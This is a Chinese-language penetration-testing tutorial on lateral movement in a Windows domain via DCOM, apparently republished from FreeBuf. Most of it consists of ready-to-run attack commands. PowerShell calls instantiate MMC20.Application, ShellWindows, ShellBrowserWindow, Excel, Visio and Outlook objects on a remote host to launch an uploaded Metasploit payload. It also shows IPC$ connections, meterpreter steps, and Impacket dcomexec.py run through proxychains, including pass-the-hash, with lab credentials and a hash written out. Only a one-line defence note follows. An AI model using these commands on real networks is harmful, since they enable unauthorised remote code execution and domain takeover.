内网渗透测试:利用DCOM进行横向渗透
发布时间:2021-02-18 20:58:11来源:FreeBuf
COM即组件对象模型(ComponentObjectModel,COM),是基于Windows平台的一套组件对象接口标准,由一组构造规范和组件对象库组成。COM是许多微软产品和技术,如Windows媒体播放器和WindowsServer的基础。
一般的对象是由数据成员和作用在其上的方法组成,而组件对象和一般对象虽有相似性,但又有较大不同。组件对象不使用方法而用接口来描述自身。接口被定义为“在对象上实现的一组语义上相关的功能”,其实质是一组函数指针表,每个指针必须初始化指向某个具体的函数体,一个组件对象实现的接口数量没有限制。
DCOM(分布式组件对象模型)是微软基于组件对象模型(COM)的一系列概念和程序接口,它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求。
DCOM是COM(组件对象模型)的扩展,它允许应用程序实例化和访问远程计算机上COM对象的属性和方法。DCOM使用远程过程调用(RPC)技术将组件对象模型(COM)的功能扩展到本地计算机之外,因此,在远程系统上托管COM服务器端的软件(通常在DLL或exe中)可以通过RPC向客户端公开其方法。
攻击者可使用DCOM进行横向移动,通过DCOM,攻击者可在拥有适当权限的情况下通过Office应用程序以及包含不安全方法的其他Windows对象远程执行命令。
使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件。例如我们滥用ShellBrowserWindowCOM对象,那么就会在远程主机的现有explorer.exe进程中执行。对攻击者而言,这无疑能够增强隐蔽性,由于有大量程序都会向DCOM公开方法,因此防御者可能难以全面监测所有程序的执行。
测试环境:Windows7
在powershell中执行如下命令获取DCOM程序列表:
Get-CimInstanceWin32_DCOMApplicationGet-CimInstance这个cmdle(powershell命令行)默认只在powershell3.0以上版本中存在,所以只有Windowsserver2012及以上版本的操作系统才可以使用Get-Ciminstance。
Windows7、WindowsServer2008中默认安装的是powershell2.0,所以他们都不支持Get-CimInstance,可以用以下命令代替Get-CimInstance:
Get-WmiObject-NamespaceROOT\CIMV2-ClassWin32_DCOMApplication
我们在获取DCOM应用程序的时候,遇到了一个MMCApplicationClass(MMC20.Application):
这个COM对象可以编程MMC管理单元操作的组件脚本。我们在本地启动一个管理员权限的powershell,执行如下命令通过PowerShell与DCOM进行交互,创建一个“MMC20.Application”对象的实例(我们只需要提供一个DCOMProgID和一个IP地址,就返回一个COM对象的实例):
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))获得COM对象的实例后,我们还可以执行如下命令枚举这个COM对象中的不同方法和属性:
#此时可执行如下命令获得"MMC20.Application"支持的操作$com.Document.ActiveView|Get-Member
如上图,可以发现该对象有一个ExecuteShellCommand方法,可用来执行命令。然后再通过ExecuteShellCommand执行命令,这里启动计算器:
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/ccalc.exe","Minimized")//启动计算器
如上图所示,本地命令执行成功。
除了MMC20.Application,还有ShellWindows、ShellBrowserWindow、Excel.Application以及Outlook.Application等等都可以为我们所利用。
我们通过MMC20.Application的ExecuteShellCommand方法在本地运行了一个“计算器”程序。如果我们提供一个远程主机的IP,便可以使用[activator]::CreateInstance([type]::GetTypeFromProgID(ProgID,IP))或[Activator]::CreateInstance([Type]::GetTypeFromCLSID(CLSID,IP))命令通过Powershell与远程DCOM进行交互,只需要提供DCOMProgID和对方的IP地址,就会向对方提供该DCOM对象的实例,然后就可以利用这个DCOM应用程序和ExecuteShellCommand方法来在对方目标主机上执行命令了。如果攻击者把“计算器”程序换成恶意的payload,就会对系统安全造成威胁。下面进行演示使用DCOM对远程主机执行命令。
下面通过几个实验来演示如何使用DCOM在远程主机上面执行命令。在使用该方法时,需要具有以下条件:
具有管理员权限的PowerShell
可能需要关闭目标系统的防火墙。
在远程主机上执行命令时,必须使用域管的administrator账户或者目标主机具有管理员权限的账户
测试环境如下:
如图中,右侧是一个内网环境,域名为god.org,有三台机器:Windows7(跳板机)、WindowsServer2008(DC)、WindowsServer2003。
WindowsServer2008(192.168.52.138)为域控制器(机器名为OWA),假设攻击者已经获得了域成员主机Windows7的一个管理员权限的meterpreter,需要进一步横向渗透去拿下内网的其他机器。
域成员服务器(Windows7):
IP地址:192.168.52.143
用户名:Aministrator
密码:Liu78963
域控制器DC(WindowsServer2008):
IP地址:192.168.52.138
用户名:Liukaifeng01
密码:Liu78963
1.先控制跳板机Windows7通过ipc连接到远程主机WindowsServer2008
netuse\\192.168.52.138\ipc$"Liu78963"/user:Aministrator
2.然后在Windows7跳板机上传一个新的metasploit木马程序shell.exe,并控制Windows7使用copy命令将shell.exe复制到WindowsServer2008的c盘上面去。
建立ipc连接并上传木马后,攻击机上开启一个新的msf监听。
3.然后控制Windows7对WindowsServer2008执行远程命令
在Windows7的meterpreter中输入如下命令,加载powershell模块并进入powershell交互模式:
loadpowershellpowershell_shell
在powershell执行如下命令:
$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.52.138"))//通过PowerShell与DCOM进行远程交互,此外,我们只需要提供一个DCOMProgID和一个IP地址,然后,它就从远程返回一个COM对象的实例。//然后执行如下命令,我们就可以调用"ExecuteShellCommand"方法在远程主机上启动进程$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/cC:\shell.exe","Minimized")
如上图所示,内网中的WindowsServer2008主机成功上线。
实验环境:
还是上面那个实验环境,同样还是先控制跳板机Windows7通过ipc连接到内网主机WindowsServer2008,并控制Windows7使用copy命令将shell.exe上传到WindowsServer2008的c盘上面去。最后进入Windows7的powershell,控制Windows7对WindowsServer2008执行远程命令,执行位于WindowsServer2008的c盘里的马:
#通过PowerShell与DCOM进行远程交互,创建ShellWindows对象的实例:$com=[Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.52.138"))
#然后执行如下命令,我们就可以调用该对象的"ShellExecute"方法在远程主机上启动进程:$com.item().Document.Application.ShellExecute("cmd.exe","/cC:\shell.exe","c:\windows\system32",$null,0)
[Activator]::CreateInstance([Type]::GetTypeFromCLSID(‘9BA05972-F6A8-11CF-A442-00A0C90A8F39’,”192.168.52.138”)).item().Document.Application.ShellExecute(“cmd.exe”,”/cC:\shell.exe”,”c:\windows\system32”,$null,0)
如上图所示,内网中的WindowsServer2008主机成功上线。
以上这两种方法均适用于Windows7~Windows10、WindowsServer2008~WindowsServer2016的系统。
并且无论是否事先建立ipc连接都可以成功执行命令,也就不需要对方主机的凭据,只只需要当前主机的管理员权限即可。
除了MMC20.Application和ShellWindows,还有以下这几种DCOM对象都可以被我们利用。
使用方法如下:
#通过PowerShell与DCOM进行远程交互,创建Excel.Application对象的实例:$com=[activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","192.168.52.138"))$com.DisplayAlerts=$false#然后执行如下命令,我们就可以调用该对象的"DDEInitiate"方法在远程主机上启动进程:$com.DDEInitiate("cmd.exe","/cC:\shell.exe")(4)调用ShellBrowserWindow远程执行命令
使用条件:适用于Windows10和WindowsServer2012R2等版本的系统。
使用方法如下:
#通过PowerShell与DCOM进行远程交互,创建Excel.Application对象的实例:$com=[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.52.138"))#然后执行如下命令,我们就可以调用该对象的"shellExecute"方法在远程主机上启动进程:$com.Document.Application.shellExecute("C:\shell.exe")#完整的命令:[activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.52.138")).Document.Application.shellExecute("C:\shell.exe")(5)调用Visio.Application远程执行命令使用条件:目标主机中安装有Visio。
使用方法如下:
#通过PowerShell与DCOM进行远程交互,创建Visio.Application对象的实例:$com=[activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application","192.168.52.138"))#然后执行如下命令,我们就可以调用该对象的"shellExecute"方法在远程主机上启动进程:$com.[0].Document.Application.shellExecute("calc.exe")#完整的命令:[activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application","192.168.52.138")).[0].Document.Application.shellExecute("C:\shell.exe")(6)调用Outlook.Application远程执行命令使用条件:目标主机中安装有Outlook。
通过Outlook创建Shell.Application对象来实现命令行执行:
#通过PowerShell与DCOM进行远程交互,创建Visio.Application对象的实例:$com=[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","192.168.52.138"))#然后执行如下命令,通过Outlook创建Shell.Application对象并执行命令:$com.createObject("Shell.Application").shellExecute("C:\shell.exe")#完整的命令:[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","192.168.52.138")).createObject("Shell.Application").shellExecute("C:\shell.exe")Impacket里的dcomexec.py脚本Impacket里面提供的dcomexec.py脚本可以提供一个类似于wmiexec.py脚本的半交互式shell,但使用的是DCOM,目前支持MMC20.Application,ShellWindows和ShellBrowserWindow对象。
命令格式如下:
./dcomexec.pydomain/username:password@ip./dcomexec.pydomain/username:password@ip
假设攻击者已经获得了域内主机WindowsServer2012的控制权,并获得了域管理员的用户名和密码,下面演示使用dcomexec.py脚本进一步获取Windows7的shell。WindowsServer2012除具有内网IP以外还具有公网IP,Windows7只有没有公网IP,只有内网IP。
首先我们在WindowsServer2012上上传代理程序,在WindowsServer2012的1080端口上搭建一个socks代理服务器,然后攻击者配置一下proxychains:
此时,我们便可以使用proxychains将攻击者的dcomexec.py代理进入内网了:
proxychains4python3./dcomexec.pygod/administrator:Liu78963@192.168.10.20//获取目标主机的shellproxychains4python3./dcomexec.pygod/administrator:Liu78963@192.168.10.20whoami//在目标主机上执行命令
如果没有获取到明文密码,我们还可以直接利用哈希值来代替
proxychains4python3./dcomexec.pyadministrator:@192.168.52.143whoami-hashesaad3b435b51404eeaad3b435b51404ee:d8f69f9520b448174136e49a1051ef07
首要的方法是启动域防火墙,因为默认情况下这会阻止DCOM对象的实例化。但尽管我们开启了防火墙,攻击者仍然可以通过某些方法远程篡改或关闭Windows防火墙。所以,我们还需要进一步设置,详情请看:https://www.anquanke.com/post/id/107097#h2-8。
参考:
https://blog.csdn.net/qq_41874930/article/details/109736280
https://3gstudent.github.io/3gstudent.github.io/域渗透-利用DCOM在远程系统执行程序/
https://xie1997.blog.csdn.net/article/details/104148658
精彩推荐
